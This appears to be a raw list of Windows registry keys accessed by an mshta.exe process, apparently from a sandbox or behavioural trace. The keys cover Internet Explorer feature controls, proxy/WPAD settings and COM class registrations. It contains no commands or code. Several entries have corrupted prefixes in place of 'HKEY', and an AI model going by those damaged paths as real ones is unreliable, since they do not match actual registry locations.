HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_DIGEST_NO_EXTRAS_IN_URI
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_ENABLE_PASSPORT_SESSION_STORE_KB948608
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_EXCLUDE_INVALID_CLIENT_CERT_KB929477
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_EXCLUDE_INVALID_CLIENT_CERT_KB929477
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_USE_UTF8_FOR_BASIC_AUTH_KB967545
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_USE_UTF8_FOR_BASIC_AUTH_KB967545
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_RETURN_FAILED_CONNECT_CONTENT_KB942615
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_RETURN_FAILED_CONNECT_CONTENT_KB942615
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_PRESERVE_SPACES_IN_FILENAMES_KB952730
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_PRESERVE_SPACES_IN_FILENAMES_KB952730
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\FromCacheTimeout
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\SecureProtocols
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\SecureProtocols
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SecureProtocols
\x5f28hEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\CertificateRevocation
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DisableKeepAlive
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\IdnEnabled
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\PreConnectLimit
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\PreResolveLimit
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SqmHttpStreamRandomUploadPoolSize
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\CacheMode
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnableHttp1_1
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnableHttp1_1
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnableHttp1_1
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyHttp1.1
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyHttp1.1
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyHttp1.1
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyHttp1.1
\x7f28hEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnableNegotiate
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DisableBasicOverClearChannel
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ClientAuthBuiltInUI
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnableAutoProxyResultCache
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\DisplayScriptDownloadFailureUI
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\MBCSServername
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\UTF8ServerNameRes
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DisableReadRange
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SocketSendBufferLength
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SocketReceiveBufferLength
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\KeepAliveTimeout
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\MaxHttpRedirects
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\MaxConnectionsPerServer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\MaxConnectionsPerServer
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\MaxConnectionsPer1_0Server
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\MaxConnectionsPer1_0Server
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\MaxConnectionsPerProxy
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ServerInfoTimeout
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ConnectTimeOut
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ConnectTimeOut
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ConnectRetries
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ConnectRetries
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SendTimeOut
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\SendTimeOut
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ReceiveTimeOut
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ReceiveTimeOut
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DisableNTLMPreAuth
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ScavengeCacheLowerBound
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\CertCacheNoValidate
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\ScavengeCacheFileLifeTime
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Security_HKLM_only
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache
HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\ScavengeCacheFileLimit
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\ScavengeCacheFileLimit
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\ScavengeCacheFileLimit
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DISABLE_NOTIFY_UNVERIFIED_SPN_KB2385266
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_DISABLE_NOTIFY_UNVERIFIED_SPN_KB2385266
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_COMPAT_USE_CONNECTION_BASED_NEGOTIATE_AUTH_KB2151543
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_COMPAT_USE_CONNECTION_BASED_NEGOTIATE_AUTH_KB2151543
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\HttpDefaultExpiryTimeSecs
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\FtpDefaultExpiryTimeSecs
\x7e60\xa7EY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DisableCachingOfSSLPages
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\LeashLegacyCookies
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DialupUseLanSettings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\DialupUseLanSettings
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SendExtraCRLF
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WpadSearchAllDomains
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\BypassHTTPNoCacheCheck
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\BypassHTTPNoCacheCheck
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\BypassSSLNoCacheCheck
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\BypassSSLNoCacheCheck
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\EnableHttpTrace
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\NoCheckAutodialOverRide
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\NoCheckAutodialOverRide
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_SCH_SEND_AUX_RECORD_KB_2618444
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_SCH_SEND_AUX_RECORD_KB_2618444
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DontUseDNSLoadBalancing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\DontUseDNSLoadBalancing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ShareCredsWithWinHttp
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\MimeExclusionListForCache
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\HeaderExclusionListForCache
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DnsCacheEnabled
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DnsCacheEntries
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DnsCacheTimeout
\x7e60\xa7EY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WarnOnPost
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WarnAlwaysOnPost
\x7e60\xa7EY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WarnOnZoneCrossing
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WarnOnBadCertRecving
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WarnOnPostRedirect
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AlwaysDrainOnRedirect
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WarnOnHTTPSToHTTPRedirect
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\TcpAutotuning
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\ProxySettingsPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnableLegacyAutoProxyFeatures
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\BadProxyExpiresTime
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AutoProxyDetectType
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\WpadOverride
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\DisableBranchCache
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\UseFirstAvailable
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\CombineFalseStartData
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DisableFalseStartBlocklist
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnforceP3PValidity
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DuoProtocols
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnableSpdyDebugAsserts
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings
\x6018iEY_LOCAL_MACHINE\SYSTEM\Setup\SystemSetupInProgress
HKEY_CURRENT_USER\Software\Microsoft\windows\CurrentVersion\Internet Settings
\x6018iEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\MigrateProxy
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyServer
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyOverride
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AutoConfigURL
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AutoDetect
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
HKEY_CLASSES_ROOT\PROTOCOLS\Name-Space Handler\
HKEY_CLASSES_ROOT\PROTOCOLS\Name-Space Handler\http\
HKEY_CLASSES_ROOT\PROTOCOLS\Name-Space Handler\*\
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_XSSFILTER
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_XSSFILTER
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_XSSFILTER\mshta.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_XSSFILTER\*
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_SHOW_FAILED_CONNECT_CONTENT_KB942615
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_SHOW_FAILED_CONNECT_CONTENT_KB942615
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\(Default)
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Compatible
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Compatible
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Version
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Version
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Pre Platform
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Pre Platform
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Platform
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Platform
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Post Platform
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Post Platform
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MAXCONNECTIONSPERSERVER
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MAXCONNECTIONSPERSERVER
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MAXCONNECTIONSPERSERVER\mshta.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MAXCONNECTIONSPERSERVER\*
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MAXCONNECTIONSPER1_0SERVER
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MAXCONNECTIONSPER1_0SERVER
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MAXCONNECTIONSPER1_0SERVER\mshta.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MAXCONNECTIONSPER1_0SERVER\*
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_URLMON_IQDA_SIZE
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_URLMON_IQDA_SIZE
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MIME_USE_BUILTIN_ACCEPT_HEADERS
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MIME_USE_BUILTIN_ACCEPT_HEADERS
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\UrlMon Settings
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnableUTF8
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\UrlEncoding
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Internet Explorer\Control Panel
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Control Panel
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Control Panel\UTF8URLQuery
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Control Panel
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Internet Explorer\BrowserStorage\AppCache
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\BrowserStorage\AppCache
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\BrowserStorage\AppCache
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\BrowserStorage\AppCache
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1A10
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\Compatibility\msHta.Exe
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{0000897b-83df-4b96-be07-0fb58b01c4a4}\LanguageProfile\0x00000000\{0001bea3-ed56-483d-a2e2-aeae25577436}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{0000897b-83df-4b96-be07-0fb58b01c4a4}\LanguageProfile\0x00000000\{0001bea3-ed56-483d-a2e2-aeae25577436}\Enable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\EnableAnchorContext
HKEY_CLASSES_ROOT\Interface\{618736E0-3C3D-11CF-810C-00AA00389B71}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{618736E0-3C3D-11CF-810C-00AA00389B71}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Classes
HKEY_CURRENT_USER\Software\Classes\Interface\{332C4425-26CB-11D0-B483-00C04FD90119}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{332C4425-26CB-11D0-B483-00C04FD90119}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{332C4425-26CB-11D0-B483-00C04FD90119}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Classes\CLSID\{00020424-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00020424-0000-0000-C000-000000000046}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00020424-0000-0000-C000-000000000046}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00020424-0000-0000-C000-000000000046}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00020424-0000-0000-C000-000000000046}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00020424-0000-0000-C000-000000000046}\InprocServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00020424-0000-0000-C000-000000000046}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00020424-0000-0000-C000-000000000046}\InprocServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00020424-0000-0000-C000-000000000046}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00020424-0000-0000-C000-000000000046}\InprocHandler
HKEY_CURRENT_USER\Software\Classes\Interface\{26656EAA-54EB-4E6F-8F85-4F0EF901A406}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{26656EAA-54EB-4E6F-8F85-4F0EF901A406}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{26656EAA-54EB-4E6F-8F85-4F0EF901A406}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Classes\Interface\{8A40A45D-055C-4B62-ABD7-6D613E2CEAEC}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{8A40A45D-055C-4B62-ABD7-6D613E2CEAEC}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{8A40A45D-055C-4B62-ABD7-6D613E2CEAEC}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Classes\Interface\{332C4425-26CB-11D0-B483-00C04FD90119}\ProxyStubClsid32
HKEY_CURRENT_USER\Software\Classes\Interface\{55272A00-42CB-11CE-8135-00AA004BB851}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{55272A00-42CB-11CE-8135-00AA004BB851}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{55272A00-42CB-11CE-8135-00AA004BB851}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocHandler
HKEY_LOCAL_MACHINE\Software\Microsoft\OleAut
HKEY_CURRENT_USER\Software\Classes\Interface\{BCD1DE7E-2DB1-418B-B047-4A74E101F8C1}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{BCD1DE7E-2DB1-418B-B047-4A74E101F8C1}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{BCD1DE7E-2DB1-418B-B047-4A74E101F8C1}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MSHTML_AUTOLOAD_IEFRAME
HKEY_CURRENT_USER\Software\Classes\Interface\{2A1C9EB2-DF62-4154-B800-63278FCB8037}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MSHTML_AUTOLOAD_IEFRAME
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{2A1C9EB2-DF62-4154-B800-63278FCB8037}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MSHTML_AUTOLOAD_IEFRAME\mshta.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{2A1C9EB2-DF62-4154-B800-63278FCB8037}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9F64103F-F384-44A8-88B3-DFA27402741D}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9F64103F-F384-44A8-88B3-DFA27402741D}\WpadDecision
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9F64103F-F384-44A8-88B3-DFA27402741D}\WpadDecisionTime
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Windows Error Reporting\WMR
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\WpadExpirationDays
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\WMR\Disable
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9F64103F-F384-44A8-88B3-DFA27402741D}\WpadDecisionReason
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9F64103F-F384-44A8-88B3-DFA27402741D}\WpadDhcp
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9F64103F-F384-44A8-88B3-DFA27402741D}\WpadDns
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9F64103F-F384-44A8-88B3-DFA27402741D}\WpadDetectedUrl
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05\WpadDecision
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05\WpadDecisionTime
